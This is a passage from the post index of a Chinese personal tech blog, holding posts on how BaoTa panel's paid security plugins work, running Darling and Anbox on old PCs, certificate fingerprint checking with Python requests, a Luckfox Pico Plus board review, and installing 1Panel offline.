另外还有一些是纯粹解析类的也没什么意思，比如网站监控报表还有WAF啥的，那些没什么技巧，就只是只要肯写这个功能就会有的东西。我的话更关心一些看起来实现还算难，值得收钱，但是实现其实很简单的东西😁。宝塔防入侵其实对于这个功能，我觉得实现应该不复杂，用SELinux或者AppArmor然后进行合理的配置应该就可以了，但是离谱的是开了这个功能我安装Redis等软件的时候各种报错，用宝塔安装Redis是通过编译安装的，正常来说不应该报错才对的啊，而且就算用了SELinux或者AppArmor也不应该有问题，另外它的报错是Segmentation fault，什么情况编译会报这种错误啊……所以我看了看它的代码，原来他们的实现根本没有用SELinux或者AppArmor，可能一是配置复杂，他们的程序员驾驭不了，二是Ubuntu和红帽系不一定都有安SELinux或者AppArmor，适配起来比较麻烦。他们用的居然是一个不知名的开源软件：Snoopy，原理也很简单，就是在环境变量里配置在运行任意软件的时候把Snoopy先加载进去，然后它就能记录程序运行时的行为了，但显然这个程序并不怎么成熟，运行某些软件的时候居然会报Segmentation fault的错误，这样的东西也好意思收钱？宝塔系统加固其实这个功能没啥特别的，但是我看它有好多关于等保的功能，因为我维护的服务器中也有需要符合等保要求的，所以这个功能对我来说还挺有用，至少可以做个参考。不过里面有些比如对文件或者文件夹的保护这个实现我还挺感兴趣的，正常来说就算拿权限限制也限制不了root，可是这个功能打开之后居然连root都没有权限操作，还是挺神奇的，之后我看了一下代码，原来有一个叫做chattr的东西，用这个可以加扩展权限，比如chattr +i <file>就可以让任何人都没有权限操作这个文件，想要操作的话必须执行chattr -i <file>解除才行。因为一般都是拿普通权限限制的，从来没考虑过扩展权限，这下学到新知识了😆。文件监控这个功能其实也不复杂，之前我写过一个定时调度器，其中的热载功能用的是watchdog，而wathcdog在Linux下其实用的就是inotify特性，宝塔在实现这个东西的时候用的是pyinotify库，其实它俩倒是没什么特别大的区别，只是watchdog能跨平台而已，虽然宝塔面板也有Windows版，不过估计应该是没有这个插件吧。堡塔企业级防篡改这个和刚才那个用chattr的从功能上来看倒是挺像的，不过这个写的是内核级，看了一下确实有个内核模块，叫做tempercore，虽然编译是在本地进行的但是代码加了密，编译还得用它文件夹里一个叫jm的程序进行编译😅，我猜它的实现应该是在内核里hook了操作文件的API，操作完之后会进行记录，不过试了一下根本没有起效果😅，不知道是我破解版的问题还是不支持Ubuntu……堡塔运维平台从功能上来看挺像Ansible的，看了一下代码是用paramiko直接在远程服务器上执行命令的。不过Ansible也是Python写的，倒是没差。功能有点太简单了，自己用脚本也能实现，不过提供了个面板可能相对适合小白吧，就是这个价格恐怕只有脑子进水的人才会买了。总结总的看来宝塔确实有些有意思的功能，实现有些挺有意思的，看了他们的代码之后感觉也能学到点东西，也许以后有机会可以用得上。但是完全不值那个价，这点东西也敢卖钱也真是挺厉害的，不过可能对于政府项目来说这些安全功能还是挺有意义的，毕竟没什么运维会去当公务员，而且企业版的价格对他们来说都已经算相当便宜了🤣。" },{ "title": "关于旧电脑的使用探索", "category": "", "tags": "旧电脑, Darling, whisper, Anbox", "url": "/2024/04/06/old-pc.html", "date": "2024/04/06", "content": "性能差也不一定要淘汰！起因最近我偶然得到了几台淘汰的废旧电脑，试着重新拼装了一下，发现还有4台电脑还能开机，所以我想试试看这些旧电脑除了性能以外有什么该被淘汰的地方。测试平台介绍本次测试的4台电脑为了方便操作，我都装了Linux发行版，Windows的话想要登录还要远程桌面太麻烦了，以下是这些电脑的配置：   一、装有 Intel® Pentium® E5300 CPU的电脑                 ..                    root@localhost.localdomain                .PLTJ.                  --------------------------               <><><><>                 OS: CentOS Stream 8 x86_64      KKSSV' 4KKK LJ KKKL.'VSSKK        Host: G31M-ES2C      KKV' 4KKKKK LJ KKKKAL 'VKK        Kernel: 6.8.1-1.el8.elrepo.x86_64      V' ' 'VKKKK LJ KKKKV' ' 'V        Uptime: 2 days, 19 hours, 11 mins      .4MA.' 'VKK LJ KKV' '.4Mb.        Packages: 953 (rpm)    . KKKKKA.' 'V LJ V' '.4KKKKK .      Shell: bash 4.4.20  .4D KKKKKKKA.'' LJ ''.4KKKKKKK FA.    Terminal: /dev/pts/2 <QDD ++++++++++++  ++++++++++++ GFD>   CPU: Pentium E5300 (2) @ 2.600GHz  'VD KKKKKKKK'.. LJ ..'KKKKKKKK FV     GPU: Intel 82G33/G31 Express    ' VKKKKK'. .4 LJ K. .'KKKKKV '      Memory: 597MiB / 2969MiB       'VK'. .4KK LJ KKA. .'KV'     A. . .4KKKK LJ KKKKA. . .4                                     KKA. 'KKKKK LJ KKKKK' .4KK                                     KKSSA. VKKK LJ KKKV .4SSKK              <><><><>               'MKKM'                 ''二、装有 AMD Athlon™ II X4 641 CPU 和 NVIDIA GeForce GT 440 的电脑            .-/+oossssoo+/-.               mayx@mayx-server         `:+ssssssssssssssssss+:`           ----------------       -+ssssssssssssssssssyyssss+-         OS: Ubuntu 20.04.6 LTS x86_64     .ossssssssssssssssssdMMMNysssso.       Kernel: 5.4.0-174-generic    /ssssssssssshdmmNNmmyNMMMMhssssss/      Uptime: 1 day, 23 hours, 13 mins   +ssssssssshmydMMMMMMMNddddyssssssss+     Packages: 1276 (dpkg), 4 (snap)  /sssssssshNMMMyhhyyyyhmNMMMNhssssssss/    Shell: bash 5.0.17 .ssssssssdMMMNhsssssssssshNMMMdssssssss.   Terminal: /dev/pts/0 +sssshhhyNMMNyssssssssssssyNMMMysssssss+   CPU: AMD Athlon II X4 641 (4) @ 2.800GHz ossyNMMMNyMMhsssssssssssssshmmmhssssssso   GPU: NVIDIA GeForce GT 440 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   Memory: 242MiB / 7925MiB +sssshhhyNMMNyssssssssssssyNMMMysssssss+.ssssssssdMMMNhsssssssssshNMMMdssssssss.                            /sssssssshNMMMyhhyyyyhdNMMMNhssssssss/                              +sssssssssdmydMMMMMMMMddddyssssssss+   /ssssssssssshdmNNNNmyNMMMMhssssss/    .ossssssssssssssssssdMMMNysssso.      -+sssssssssssssssssyyyssss+-        `:+ssssssssssssssssss+:`            .-/+oossssoo+/-.三、装有 Intel® Pentium® G3240 CPU的电脑            .-/+oossssoo+/-.               mayx@mayx-server         `:+ssssssssssssssssss+:`           ----------------       -+ssssssssssssssssssyyssss+-         OS: Ubuntu 22.04.4 LTS x86_64     .ossssssssssssssssssdMMMNysssso.       Host: H81M-S1    /ssssssssssshdmmNNmmyNMMMMhssssss/      Kernel: 5.15.0-101-generic   +ssssssssshmydMMMMMMMNddddyssssssss+     Uptime: 2 days, 19 hours, 58 mins  /sssssssshNMMMyhhyyyyhmNMMMNhssssssss/    Packages: 984 (dpkg), 6 (snap) .ssssssssdMMMNhsssssssssshNMMMdssssssss.   Shell: bash 5.1.16 +sssshhhyNMMNyssssssssssssyNMMMysssssss+   Terminal: /dev/pts/3 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   CPU: Intel Pentium G3240 (2) @ 3.100GHz ossyNMMMNyMMhsssssssssssssshmmmhssssssso   GPU: Intel HD Graphics +sssshhhyNMMNyssssssssssssyNMMMysssssss+   Memory: 371MiB / 3800MiB .ssssssssdMMMNhsssssssssshNMMMdssssssss. /sssssssshNMMMyhhyyyyhdNMMMNhssssssss/                              +sssssssssdmydMMMMMMMMddddyssssssss+                                /ssssssssssshdmNNNNmyNMMMMhssssss/    .ossssssssssssssssssdMMMNysssso.      -+sssssssssssssssssyyyssss+-        `:+ssssssssssssssssss+:`            .-/+oossssoo+/-.四、装有 Intel® Xeon® E5-2620 CPU的电脑            .-/+oossssoo+/-.               mayx@mayxserver         `:+ssssssssssssssssss+:`           ---------------       -+ssssssssssssssssssyyssss+-         OS: Ubuntu 22.04.4 LTS x86_64     .ossssssssssssssssssdMMMNysssso.       Host: X79 0.9    /ssssssssssshdmmNNmmyNMMMMhssssss/      Kernel: 5.15.0-101-generic   +ssssssssshmydMMMMMMMNddddyssssssss+     Uptime: 18 hours, 41 mins  /sssssssshNMMMyhhyyyyhmNMMMNhssssssss/    Packages: 773 (dpkg), 9 (snap) .ssssssssdMMMNhsssssssssshNMMMdssssssss.   Shell: bash 5.1.16 +sssshhhyNMMNyssssssssssssyNMMMysssssss+   Terminal: /dev/pts/0 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   CPU: Intel Xeon E5-2620 0 (12) @ 2.500GHz ossyNMMMNyMMhsssssssssssssshmmmhssssssso   Memory: 8773MiB / 11928MiB +sssshhhyNMMNyssssssssssssyNMMMysssssss+.ssssssssdMMMNhsssssssssshNMMMdssssssss.                            /sssssssshNMMMyhhyyyyhdNMMMNhssssssss/                              +sssssssssdmydMMMMMMMMddddyssssssss+   /ssssssssssshdmNNNNmyNMMMMhssssss/    .ossssssssssssssssssdMMMNysssso.      -+sssssssssssssssssyyyssss+-        `:+ssssssssssssssssss+:`            .-/+oossssoo+/-.使用探索其实对我来说，性能根本不是什么问题，毕竟想想即使是这些淘汰的电脑，性能也比树莓派强的多，包括对比上次买的Luckfox Pico Plus来说就强的更多了，所以即使性能比较差的电脑也不是不能用。   不过这些老机器还是有一些坑的，像第一台奔腾E5300的电脑，我试了一下Ubuntu就装不上，安装程序都打不开，可能还是有一些有差别的地方，所以安装了CentOS Stream 8。不过还好这些机器都是64位的CPU，如果是32位的就更麻烦了，可能很多包都没地方下载。关于Darling的探索那么对于这些机器来说干点什么好呢？当然除了GPIO之类的，树莓派能干的他们也能干，所以要干就干一些特别的东西。我想了一下，我平时用的电脑是macOS系统，虽然给那些旧电脑装黑苹果可能不太现实，但是我之前发现了一个叫Darling的项目，类似Wine那样在Linux上运行Windows程序，这个项目可以在Linux上运行macOS的程序。看起来挺有意思的，所以我打算在第一台机器上试着安装一下。   不过我按照官方文档上安装，对于CentOS Stream 8来说有好多包不知道为什么似乎都没有，比如libavformat-free-devel之类的，我只好从网上找其他RedHat系列类似的包，或者找替代品FFmpeg，另外Darling需要Linux 5.0或者更高的内核，CentOS的内核版本太低了，所以我升到了主线版本的Linux，也就是6.8的版本……最终花了一天的时间终于编译好了，然而悲剧的是运行的时候报了非法指令“Illegal instruction (core dumped)”的错误。一般来说这个错误是新机器上编译的程序在旧机器运行才会报的错，可我是在同一台机器上编译的为什么会报这种错误呢？可能是因为代码里包含汇编语言的代码吧。我发了个Issue问了一下作者，不过看起来他也不知道是什么问题……   对于这种问题我感觉也没什么好办法……可能这台机器真的就没办法了？在第二台速龙641的电脑上试了一下也不行……不过后来我在第三台装有奔腾G3240的电脑上试着编译安装了一下，结果可以运行。看来确实是奔腾E5300的问题。不过它俩到底差在哪里呢？看介绍会发现奔腾G3240里包含了Intel® SSE4.1和Intel® SSE4.2的指令集扩展。那么对于没有这个指令集扩展的CPU就没办法了吗？Intel官方给了一个解决方法是Intel® SDE，可以在旧机器上模拟运行使用了最新指令集的程序，甚至包括AVX512都可以模拟的出来，但是我用这个东西运行Darling的时候还是报错了，可能Darling需要用到内核的一些特性，但是SDE不能模拟……这都没办法是不是就彻底没办法了呢？   在偶然的一次浏览中，我发现了一个神奇的东西，内核扩展OPEMU，它可以让不支持一些指令集扩展的CPU通过模拟的方式支持，其实功能和SDE很像，只是它是在内核中运行的，我试着在第一台机器上编译安装了一下（顺便一说，如果是旧的5.x或者更早的Linux可以直接用这个仓库，而更新的Linux比如6.x的需要用PR中的这个仓库），结果Darling真的可以运行了！真是令人难以置信。   安装成功之后我在网上找了个C语言的程序：endoh1，这个程序可以用文本模拟流体。我在我的MacBook上编译了试了一下，运行没有问题，当然直接编译的程序是ARM64的程序，肯定不能在Darling里面运行，于是我切换到x86_64模式下又编译了一次，并且用lipo命令把两个程序合并到了一起，然后把程序上传到第一台机器中使用Darling运行，竟然可以正常运行，看来那个内核扩展还不错啊，Darling居然没有出问题。   不过测试了一下，可能还是有些地方有BUG，比如用Git的时候会报错，可能是和README中所说的CRC32表现有问题吧，不过Darling好像可以直接运行Linux中的命令，那我在用Git的时候调用Linux下的Git是不是也可以呢？试了一下不太行，因为执行Linux程序的时候不能用Darling中的目录结构，不过我想装omz只需要/Users目录就够了，我直接创建一个软链接把Darling的/Users目录映射到Linux的根目录就可以了吧，试了一下还行，可以正常运行，虽然Homebrew不能安装有点可惜……不过Neofetch可以安装😆，效果如下：                    'c.          root@localhost.localdomain                  ,xNMM.          --------------------------                .OMMMMo           OS: macOS 11.7.4 Darling x86_64                OMMM0,            Kernel: 20.6.0      .;loddo:' loolloddol;.      Uptime: 2 days, 21 hours, 11 mins    cKMMMMMMMMMMNWMMMMMMMMMM0:    Shell: bash 3.2.57  .KMMMMMMMMMMMMMMMMMMMMMMMWd.    DE: Aqua  XMMMMMMMMMMMMMMMMMMMMMMMX.      WM: Quartz Compositor ;MMMMMMMMMMMMMMMMMMMMMMMM:       WM Theme: Blue (Print: Entry, AppleInterfaceStyle, Does Not Exist) :MMMMMMMMMMMMMMMMMMMMMMMM:       Terminal: /dev/pts/2 .MMMMMMMMMMMMMMMMMMMMMMMMX.      Memory: 0MiB / 2969MiB  kMMMMMMMMMMMMMMMMMMMMMMMMWd. .XMMMMMMMMMMMMMMMMMMMMMMMMMMk                             .XMMMMMMMMMMMMMMMMMMMMMMMMK.                               kMMMMMMMMMMMMMMMMMMMMMMd     ;KMMMMMMMWXXWMMMMMMMk.       .cooc,.    .,coo:.既然第一台电脑装了内核扩展还是有BUG，那么对于第三台电脑来说总该没问题了吧，试了一下Git可以正常运行，安装Homebrew也没问题，但是用brew安装软件的时候会报错，似乎是因为Darling安装的Command Line Tools for Xcode太旧了，有些命令没有所以不能正常安装，不过Neofetch又不需要编译，试着安装了一下没问题，但是运行的时候会报Segmentation fault: 11 (core dumped)的错误……不知道是什么问题。关于旧显卡利用的探索对于第二台电脑，可以看出来它有一张上古的独显NVIDIA GeForce GT 440，我装好驱动之后运行nvidia-smi可以看到：Sat Apr  6 08:26:45 2024       +------------------------------------------------------+                       | NVIDIA-SMI 340.108    Driver Version: 340.108        |                       |-------------------------------+----------------------+----------------------+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC || Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. ||===============================+======================+======================||   0  GeForce GT 440      Off  | 0000:01:00.0     N/A |                  N/A || 40%   49C    P0    N/A /  N/A |      3MiB /  1023MiB |     N/A      Default |+-------------------------------+----------------------+----------------------+                                                                               +-----------------------------------------------------------------------------+| Compute processes:                                               GPU Memory ||  GPU       PID  Process name                                     Usage      ||=============================================================================||    0            Not Supported                                               |+-----------------------------------------------------------------------------+既然是独显，那么果然还是想试试看能不能跑机器学习的算法呢。可是一般来说执行上面的命令可以看到显卡支持的CUDA版本，这个执行完并没有显示啊……那我要怎么用？首先我想试试装个PaddleOCR试试看，但就是因为不知道这个显卡到底能用哪个版本的CUDA，也不知道安装哪个版本的PaddlePaddle框架，更何况之前的机器学习算法对环境要求特别严格，甚至系统新了都没法用，于是在各种报错下我败下阵来，放弃使用CUDA来用这张显卡😭……   但并不代表机器学习必须使用CUDA，OpenCL也是可以的啊，正好我之前在测试OpenAI的ASR模型Whisper，有人开发的一个C++使用这个模型的软件whisper.cpp是支持通过CLBlast使用OpenCL。于是我就先编译安装了CLBlast，然后用对应的参数编译了whisper.cpp，总算是能跑起来了，后来看了一眼clinfo，原来这张显卡才支持CUDA 6.5啊，这能运行啥啊……最后试了一下效果也挺令人失望的，就测试的那个音频用了大概33秒左右才转录完成，果然旧显卡就是纯粹的垃圾啊。关于Anbox Cloud的探索现在轮到第四台至强E5-2620的电脑了呢，这台电脑可不一般，用的是服务器上用的CPU，一看就是被奸商坑了，买了个i9级处理器，殊不知是淘汰的洋垃圾🤣。不过我手头用的服务器其实也没多好，一台是至强E5-2620v2（双路），另一台是至强E5-2620v3（也是双路）（一二三代都有了🤣）：            .-/+oossssoo+/-.               mayx@mayx-server         `:+ssssssssssssssssss+:`           ----------------------       -+ssssssssssssssssssyyssss+-         OS: Ubuntu 22.04.3 LTS x86_64     .ossssssssssssssssssdMMMNysssso.       Host: NF5270M3 00001    /ssssssssssshdmmNNmmyNMMMMhssssss/      Kernel: 5.15.0-78-generic   +ssssssssshmydMMMMMMMNddddyssssssss+     Uptime: 84 days, 22 hours, 20 mins  /sssssssshNMMMyhhyyyyhmNMMMNhssssssss/    Packages: 954 (dpkg), 4 (snap) .ssssssssdMMMNhsssssssssshNMMMdssssssss.   Shell: bash 5.1.16 +sssshhhyNMMNyssssssssssssyNMMMysssssss+   Resolution: 1440x900 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   Terminal: /dev/pts/1 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   CPU: Intel Xeon E5-2620 v2 (24) @ 2.600GHz +sssshhhyNMMNyssssssssssssyNMMMysssssss+   GPU: 0b:00.0 ASPEED Technology, Inc. ASPEED Graphics Family .ssssssssdMMMNhsssssssssshNMMMdssssssss.   Memory: 68987MiB / 128875MiB  /sssssssshNMMMyhhyyyyhdNMMMNhssssssss/  +sssssssssdmydMMMMMMMMddddyssssssss+                                /ssssssssssshdmNNNNmyNMMMMhssssss/                                  .ossssssssssssssssssdMMMNysssso.      -+sssssssssssssssssyyyssss+-        `:+ssssssssssssssssss+:`            .-/+oossssoo+/-.            .-/+oossssoo+/-.               mayx@mayx-algo-server         `:+ssssssssssssssssss+:`           ---------------------       -+ssssssssssssssssssyyssss+-         OS: Ubuntu 22.04.3 LTS x86_64     .ossssssssssssssssssdMMMNysssso.       Host: PowerEdge R730    /ssssssssssshdmmNNmmyNMMMMhssssss/      Kernel: 5.15.0-91-generic   +ssssssssshmydMMMMMMMNddddyssssssss+     Uptime: 84 days, 20 hours, 16 mins  /sssssssshNMMMyhhyyyyhmNMMMNhssssssss/    Packages: 1047 (dpkg), 4 (snap) .ssssssssdMMMNhsssssssssshNMMMdssssssss.   Shell: bash 5.1.16 +sssshhhyNMMNyssssssssssssyNMMMysssssss+   Resolution: 1024x768 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   Terminal: /dev/pts/1 ossyNMMMNyMMhsssssssssssssshmmmhssssssso   CPU: Intel Xeon E5-2620 v3 (24) @ 3.200GHz +sssshhhyNMMNyssssssssssssyNMMMysssssss+   GPU: NVIDIA Tesla T4 .ssssssssdMMMNhsssssssssshNMMMdssssssss.   GPU: NVIDIA Tesla T4  /sssssssshNMMMyhhyyyyhdNMMMNhssssssss/    Memory: 66345MiB / 128808MiB   +sssssssssdmydMMMMMMMMddddyssssssss+   /ssssssssssshdmNNNNmyNMMMMhssssss/                                  .ossssssssssssssssssdMMMNysssso.                                     -+sssssssssssssssssyyyssss+-        `:+ssssssssssssssssss+:`            .-/+oossssoo+/-.都是正儿八经的洋垃圾，不过对于服务器嘛，垃圾一点也没什么，又不是不能用，至少比租的云服务器好吧。   不过既然是服务器级的CPU，自然实验也得要符合服务器级（这个级别的处理器就不用担心什么指令集缺失之类的问题了），正好最近注册了个Ubuntu Pro，里面有个Anbox Cloud，可以拿来试试看。   关于Anbox，我之前试过Waydroid和redroid，不过Anbox Cloud不太一样，这个有点像OpenStack那样，是云手机的管理和实现平台，Anbox对它来说就像QEMU对OpenStack，是创建实例的工具。安装还挺简单的，启用Ubuntu Pro之后再执行sudo pro enable anbox-cloud，剩下的跟着提示走就行了，不过因为我的硬盘有点问题，有一半的区域有坏块，虽然屏蔽掉了但还是有些问题，第一次安装失败了，第二次才成功。不过应该说不愧是云平台吗，用起来和我当年学OpenStack在虚拟机里安装一样卡，而且啥也没干先占掉8GiB内存，尤其是对这个又老，内存也小的垃圾旧机器来说果然还是有点勉强啊，更何况硬盘还是坏的🤣。安装好之后用浏览器直接输入IP就能登录平台了，第一次使用要绑定Ubuntu One账号，感觉有点不开放啊……登录之后可以上传应用作为模板，类似镜像那样，可以在创建会话的时候使用相同的镜像，然后每个会话之间是隔离的。不过有个问题是这个东西居然没有ARM兼容层，上传不兼容x86_64的软件会不允许创建应用😅，这有点废物啊，难不成想用这个东西搭个云手机厂商还要买一堆ARM的服务器？之后我找了半天发现Via浏览器可以兼容所有架构的处理器，上传上去之后又报错一次😅，重新再上传才算正常运行起来了。感想经过这次的测试，可以看出来这些旧电脑其实安装了Linux发行版之后除了会遇到一堆莫名其妙的问题之外，并不是不能用，顶多是卡了一些，或者要花点精力解决罢了。其实这么看来，除了人工智能方面的发展确实受到了硬件方面的制约，其他的程序其实都无所谓呢？即使是现在的软件放到以前的电脑上也能运行，不知道是软件发展的太慢，还是兼容性做的太好了呢？" },{ "title": "如何用requests库验证证书", "category": "", "tags": "Python, requests, ssl", "url": "/2024/03/16/ssl-pinning.html", "date": "2024/03/16", "content": "用Python制作的程序怎么样？起因之前在抓包某些APP的时候，可能会遇到即使信任了抓包软件的CA根证书也无法抓包的情况，听说之所以遇到这种情况是因为那些APP使用了“SSL Pinning”的技术，可以只信任代码中认为可以信任的证书。不过对于逆向之类的事情我并不擅长，这种问题我也不太会解决。但是不能解决问题我可以创造问题啊，Java的APP我不会写，但是我会用Python写，所以今天来看看怎么样用Python实现类似“SSL Pinning”的技术。实现方案真正的SSL Pinning似乎是通过预置网站所使用的根证书或者中间证书来实现的，这样的好处是即使证书到期换了证书也能继续验证。不过我觉得其实没必要这么麻烦，一般Python程序要连接的后端也没必要在浏览器中调用，大不了就自签一个证书，然后自己验证证书就好了，反正中间人攻击重新签的公钥证书的指纹肯定和原来网站公钥证书的指纹不一样，用这一点就可以判断有没有被抓包。   不过我搜了一下，如果想实现这个功能，首先请求的时候就要获得网站的证书，很多资料都是直接用socket和ssl这两个包实现的，但是在python上请求一般都是用requests，用socket操作有点太麻烦了吧，再问问AI呢？AI给出的回复是：response.raw.connection.getpeercert()，结果执行了根本没有这个方法，不愧是只会东拼西凑，这应该是ssl库的函数吧……要么可以用urllib3.contrib.pyopenssl.ssl.get_server_certificate()这个方法获取，但是这个方法不是在发起请求的时候获取的证书，而是直接先访问了一下服务器然后直接获取的证书，这样每次调用接口的时候可能就要请求两次服务器了，感觉不怎么好……后来去Stack Overflow上搜了一下，还真有关于类似这个问题的讨论，于是我简单改编了一下，最终效果如下：import requestsimport hashlibHTTPSConnection = requests.packages.urllib3.connection.HTTPSConnectionorig_HTTPSConnection_connect = HTTPSConnection.connectdef new_HTTPSConnection_connect(self):    orig_HTTPSConnection_connect(self)    try:        self.peer_certificate = self.sock.getpeercert(binary_form=True)    except AttributeError:        passHTTPSConnection.connect = new_HTTPSConnection_connectdef verify_cert_request(url):    with requests.get(url, stream=True, verify=False) as r:        result = [ hashlib.sha256(r.raw.connection.sock.getpeercert(binary_form=True)).hexdigest(), r.text ]    return resultresult = verify_cert_request('https://www.baidu.com')print(result[0])print(result[1][:10])用这个代码就能获取到请求的网站中证书的指纹了，如果不希望其他人抓包，先自己计算一下自己证书的hash指纹，然后在代码中执行逻辑的时候先判断一下请求网站的指纹是不是自己网站的指纹，如果不是还可以考虑一下反制措施？这样就能实现证书的验证了。后记不过Python作为解释型语言，代码不是随便看😂？就算用Cython然后加壳啥的调用的库依然不是加密的，大不了修改依赖的库然后让它返回的结果向正确的凑可能也行？不过这样至少能防止绝大多数抓包的人了。" },{ "title": "Luckfox Pico Plus使用体验", "category": "", "tags": "开发板, 树莓派", "url": "/2024/02/24/luckfox.html", "date": "2024/02/24", "content": "开发板还是越小越好啊起因前段时间，银行送了我一张满50减50的淘宝不限品类优惠券，但是我一时半会没想好买什么。不知道怎么的就想起在Bilibili上看到的微型开发板Luckfox Pico系列，当时看了视频觉得挺有意思的，这次既然有机会了就可以买一个了吧……不过有这钱去买箱牛奶不好吗🤣。   最终买的Luckfox Pico Plus开发板，当时的价格是52CNY，加了8CNY的运费，然后用券抵完就是10CNY了。价格看上去挺不错的，不过相比之下还是不如随身WiFi便宜，那个正常买好像也才10CNY，而且整体性能也要比这个好很多，还能用WiFi联网……不过既然买了就玩玩呗，看起来也挺有意思的。使用体验从外观来看，整体大小只有一根食指大，因为选了带RJ45接口的板子所以其实不算特别小，而且背面甚至没有焊元件，其实它的SOC RV1103只有不到小拇指指甲盖的大小，很难不相信它其实还能做的更小。安装系统刚买来的时候里面有预装的测试系统，不过测试系统几乎把里面的空间都占满了，肯定是不能用的，我去看了看官方的Wiki，官方有提供编译好的BusyBOX、Ubuntu、buildroot以及Alpine Linux，也有可以自己编译的SDK。对我来说我也不愿意整麻烦的事情，所以肯定会选编译好的，至于系统也肯定要有软件包管理器的，另外因为这个开发板只有64MiB的内存和128MiB的存储（虽然可以插TF卡，但是内存还是没法加），系统也不能太大，所以就只有Alpine Linux可以选了。我之前在虚拟机里测试过Alpine Linux，体验还是挺不错的。   安装方法也很简单，官网的Wiki有详细的说明。不过有一些不太一样的地方，我没有USB转UART串口模块，我有的只是树莓派。所以烧录完系统之后的改密码以及配置网络的过程就得用树莓派来做了，其实这体现了一下树莓派的作用，至少那堆GPIO接口不是当摆设的🤣。用法的话就是首先刷一个树莓派的官方系统到树莓派上，然后在配置里打开UART并关掉树莓派的串口登录，按官网的图接三根线，只要是导线就行，对树莓派来说应该是第8和第10脚分别是RX和TX，第6脚有一个地线，依次接到开发板上，在终端里安装screen，使用screen /dev/serial0 115200，就可以登录开发板的终端了，如果连接有问题可能是RX和TX接反了，反过来重新插一下就行。之后改密码以及配置网络就很简单，配置好之后连上网线就可以正常使用了。   不过这个系统有个缺陷，没有配置TF卡，这还是挺重要的，回头有时间可能还是得编译个能使用TF卡的Alpine Linux，或者看看官方愿不愿意编译一个？使用软件安装好系统之后就可以用SSH连接了。首先试了一下安装软件，Alpine Linux的软件包管理器apk用法和apt的用法差不多，而且源里的软件也非常多，安装了个Python3试了一下，没有任何问题，安装好pip之后安装python包也没有问题，这样就可以运行我用python写的一些定时任务了。另外我又下了一个go-cqhttp搭了个机器人试了一下，居然也能正常运行，看来64MiB的内存还可以啊，跑些软件还是绰绰有余的，这么看来的话就可以替代掉我的树莓派了，反正我的树莓派平时除了网口其他的口都没用，运行些定时任务或者QQ机器人又觉得利用的性能太少了，而且很明显的是这个东西显然比树莓派的能耗要小的多，挂在家里挺合适的，不过缺陷可能就是如果哪天我想整个电台，树莓派的GPIO接口还能派上用场，这个Luckfox Pico Plus的GPIO可能除了最开始装系统的时候用了一下，之后就再没有用了。   另外作为在家里装的开发板，内网穿透也是需要的，但是装了个go-cqhttp之后内存就剩下30MiB了，还要考虑定时任务运行时也要用掉一些内存，用frp肯定不太合适，但是用ssh的话又容易断，我想了一下干脆折中一下用autossh吧，如果断了也能自动重连。感想感觉作为开发板，Luckfox Pico Plus相比树莓派来说用途差不多，而树莓派的定位却不太准确，又想当开发板，又想当普通PC，结果作为开发板价格有点贵，尺寸有点大，功耗也有点高；作为PC性能过差，啥也干不了；作为NAS接硬盘也接不了几块，才两个USB3.0口，还要另外接供电，属实是比上不足，比下有余。这款产品我倒是觉得挺不错的，主要是颜值比较吸引我😆，其实还有和这个一样芯片的另外一个开发板，更便宜还带WiFi模块，但是相比之下还是这个好看，所以如果想整开发板我觉得Luckfox Pico Plus比树莓派更合适。" },{ "title": "如何离线安装1Panel", "category": "", "tags": "离线, 1Panel", "url": "/2024/02/03/1panel.html", "date": "2024/02/03", "content": "Go写的程序感觉离线使用还挺方便的起因为了更好的管理服务器，我之前用过几种面板，比如宝塔，小皮，appnode还有1Panel之类的，之所以用面板主要还是觉得这种用起来方便一些。有些脑子不合适的人看不起使用面板的人，他们可能用了比如软件包安装，或者源码编译、容器等等，结果一顿操作猛如虎，结果配置还是安装默认的，连调优都没做🤣。   总之最近正好需要在不能连接互联网的地方安装LEMP的环境，虽然现在的面板很多，但是似乎很少有面板支持离线安装。宝塔好像有付费的离线安装服务，但是我首先不信任宝塔，另外怎么可能给他们付钱呢😆？1Panel虽然官方不支持离线安装，但是社区中有离线安装的方法，不过好像不能使用网站管理的功能……当然经过我的测试，其实是有办法可以使用网站管理的功能，所以分享一下方法。离线安装1Panel的方法一般想离线安装的话搜到的文章应该就是这篇文章了吧，看起来操作有一点点复杂，不过评论里有个人整了个可以离线安装的项目，使用起来非常简单，连docker也一起安装了。只是使用的时候稍微有一点点坑，就是它的“–install-dir”参数默认是“/opt/1panel”，但是安装的时候会在这个目录里再建一个1panel文件夹，所以在使用的时候最好手动把参数设置为“–install-dir /opt”。   安装没什么问题，不过应用商店是空的，什么软件都安装不了，我在社区论坛里找了一下，好像可以把在互联网端1Panel实例中“/opt/1panel/resource/apps/remote”中的文件拷到离线设备中的“/opt/1panel/resource/apps/local”下，然后点更新就可以了，我试了一下确实可以，把镜像导出来再导入到离线设备，直接安装可能会报错，但是重建一下容器就能正常启动了。虽然容器是启动了，但是面板好像没识别到，还是不能管理，而且应用的文件被放在了“/opt/1panel/apps/local”目录下，就算能识别到，文件路径也是错的。看来得让面板认为导入的程序不是本地安装的，而是在线安装的。离线安装1Panel中应用的方法我在网上怎么搜，都没有找到现成的解决方法，看来只能我自己研究了😂。我找了一下，面板安装目录下有一个“/opt/1panel/db/1Panel.db”文件，应该是面板的数据库，我用sqlite3客户端打开看了一下，里面的apps表中可以看到应用被导入了，但是key在前面都被加了local，比如openresty变成了localopenresty，我对比了一下互联网端的数据库，除了这一处外，还有resource字段的内容也从remote变成了local。既然是这里有不一样的地方那就把它改成一样的呗，另外这里的字段名既然叫resource，那么肯定和那个目录也有关系，所以就得把“/opt/1panel/resource/apps/local”文件夹下的内容再全部移动到“/opt/1panel/resource/apps/remote”中，把数据库上传然后重启，离线环境中的1Panel也能正常识别了，而且安装后网站标签页也能正常创建网站之类的操作了。   